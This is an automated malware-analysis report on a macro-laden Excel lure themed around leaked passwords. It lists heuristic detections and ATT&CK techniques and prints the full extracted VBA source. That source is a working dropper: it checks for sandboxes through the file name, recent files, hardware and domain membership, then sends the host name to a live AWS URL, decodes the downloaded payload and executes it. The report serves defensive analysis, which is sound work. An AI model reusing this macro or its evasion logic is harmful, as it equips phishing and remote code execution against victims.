MALICIOUS
518
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1071.001 Web Protocols
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The VBA macro within the Excel document executes an Auto_Open subroutine which attempts to download a file from a provided URL using MSXML2.XMLHTTP. The downloaded content is then saved to disk as 'Details.dat' and 'LeakDetails.dat' in the temporary directory. This behavior is indicative of a downloader or credential harvesting tool, as suggested by the ClamAV detection 'Doc.Downloader.Valyria-10026858-0'. The document body content, listing email addresses and 'Password Leaked', further supports a credential harvesting or phishing pretext.
Heuristics 12
-
ClamAV: Doc.Downloader.Valyria-10026858-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-10026858-0
-
VBA project inside OOXML medium 9 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set s = CreateObject("WScript.Shell") -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Set s = CreateObject("WScript.Shell") -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set b = CreateObject("WScript.Network") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
r.Write o.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set b = CreateObject("WScript.Network") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
a = Environ("Temp") & "\Details.dat" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ec2-18-184-17-12.eu-central-1.compute.amazonaws.com/standardchartered/passleak/180821/ Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4717 bytes |
SHA-256: e6c9bec05b3b9189e2794851b3aac471741b1fe0412bae4837307cb0b495bcb5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
ActiveSheet.Shapes("fBox").Visible = False
ActiveSheet.Shapes("fText").Visible = False
ActiveSheet.Unprotect
ActiveSheet.Range("A1", "Z100").Locked = True
ActiveSheet.Protect
checkFileName
End Sub
Sub Workbook_BeforeClose()
ActiveSheet.Shapes("fBox").Visible = True
ActiveSheet.Shapes("fText").Visible = True
ActiveSheet.Unprotect
ActiveSheet.Range("A1", "Z100").Locked = True
ActiveSheet.Protect
End Sub
Private Sub Get_Data(userId)
Set b = CreateObject("WScript.Network")
c = b.ComputerName
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.Open "GET", "http://ec2-18-184-17-12.eu-central-1.compute.amazonaws.com/standardchartered/passleak/180821/" & userId & "?uid=" & c & "&seid=" & DateDiff("s", "1/1/1970 00:00:00", Now()), False
o.Send
Set r = CreateObject("ADODB.Stream")
r.Type = 1 'adTypeBinary
a = Environ("Temp") & "\Details.dat"
b = Environ("Temp") & "\LeakDetails.dat"
d = Environ("Temp") & "\leakdetails.log"
r.Open
r.Write o.responseBody
r.SaveToFile a, 2 'adSaveCreateOverWrite
Set r = Nothing
Set c = CreateObject("Scripting.FileSystemObject")
c.CopyFile a, b
Set fso = CreateObject("Scripting.Filesystemobject")
Set base_file = fso.OpenTextFile(b, 1)
Content = base_file.ReadAll()
base_file.Close
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.DataType = "bin.base64"
oNode.Text = Content
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile d, 2
Set s = CreateObject("WScript.Shell")
s.Exec d
c.DeleteFile (a)
c.DeleteFile (b)
End Sub
Private Sub checkFileName()
Dim name As String
Dim nArray() As String
name = Application.Caption
nArray = Split(name, " ")
If nArray(0) <> "LeakedPasswords180821.xlsm" Then
badName = True
Else
checkRecentDocs
End If
End Sub
Private Sub checkRecentDocs()
Dim hard
If Application.RecentFiles.Count < 3 Then
Application.Quit
Else
IsHardwareReliable
End If
End Sub
Private Sub IsHardwareReliable()
Dim objWMIService, objItem, colItems, dotSplace, hwGtest
Dim totalSize, sumRamVal, cpusNum As Integer
hwGtest = True
totalSize = 0
sumRamVal = 0
cpusNum = 0
Const wbemFlagReturnImmediately = &H10
Const wbemFlagForwardOnly = &H20
dotSplace = "."
Set objWMIService = GetObject _
("winmgmts:\\" & dotSplace & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_LogicalDisk")
For Each objItem In colItems
Dim num
num = Int(objItem.Size / 1073741824)
If num > 0 Then
totalSize = totalSize + num
End If
Next
If totalSize < 100 Then
hwGtest = False
End If
Set colComputer = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer In colComputer
sumRamVal = sumRamVal + Int((objComputer.TotalPhysicalMemory) / 1048576) + 1
Next
If sumRamVal < 4096 Then
hwGtest = False
End If
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems2
cpusNum = cpusNum + objItem.NumberOfLogicalProcessors
Next
If cpusNum < 4 Then
hwGtest = False
End If
If hwGtest Then
checkPartOfDomain objWMIService
End If
End Sub
Private Sub checkPartOfDomain(objWMIService)
inDomain = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
inDomain = True
End If
Next
If Not inDomain Then
Application.Quit
Else
Get_Data "b0c94f1fd7ad5350d12ddba3f281faa6"
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
SHA-256: c69999f0e8eda33065a55523b2c9be9de8d8bcc890daa6422ca6089ad233f878 |
|||
|
Detection
ClamAV:
Doc.Downloader.Valyria-10026858-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.